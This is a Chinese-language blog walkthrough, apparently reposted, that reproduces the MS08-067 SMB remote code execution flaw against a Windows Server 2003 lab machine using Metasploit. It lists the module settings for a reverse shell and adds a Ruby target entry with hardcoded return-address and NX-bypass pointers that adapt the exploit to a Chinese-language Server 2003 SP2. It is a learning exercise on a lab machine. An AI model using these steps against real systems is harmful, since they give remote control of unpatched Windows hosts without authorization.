MS08-067 遠程執行代碼 漏洞復現


漏洞編號:MS08-067
披露日期: 2008/10/22
受影響的操作系統:Windows 2000;XP;Server 2003;Server 2008;
 
目標系統 Microsoft(R) Windows(R) Server 2003, Enterprise Edition
使用工具metasploit 搜索漏洞庫
search ms08_067

use 載入漏洞

 通過“show options"可以查看所需要的設置;

yes 都是可填的

使用" show targets"可以查看滲透攻擊模塊可以成功攻擊的平台;

我們這里可以看到 有 windos 2003 sp1,sp2 ,xp,2000 更具系統選擇利用的payload

即 設置”set target 34"

  設置攻擊目標“set RHOST 目標ip地址”

  設置回傳端口"set LPORT 5000"

  設置主機ip" set LHOST 主機ip“

運行exploit就可以看到成果了 等待反彈shell 但是這里遇到一個問題我的windows server 2003系統是中文的 不是英文的所以需要對ms08_067_netapi_ser2003_zh.rb   

進行修改 重新打開終端  然后切換到已下目錄:/usr/share/metasploit-framework/modules/exploits/windows/smb

在ms08_067_netapi_ser2003_zh.rb中增加以下代碼,修改是4個指針地址

 ['Windows 2003 SP2 Chinese (NX)',

           {

             'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)

             'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

             'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)

             'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL

             'Scratch'   => 0x00020408,

           }

          ],

輸入

vim ms08_067_netapi_ser2003_zh.rb

:set number 

輸入 /Windows 2003 SP2

這里我們幫他構建一個   652 -659行復制   輸入  10y   回車 

在p  復制到你想要的地方

在退出 exit   輸入 msfconsole    

從新復現上面的步驟  search targets    可以看到我們剛剛添加的中文利用版本

  

重復上面的步驟 發現

讓 目標重啟  應該目標機已經崩潰 

嘗試重啟目標主機,執行相同操作,攻擊成功。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM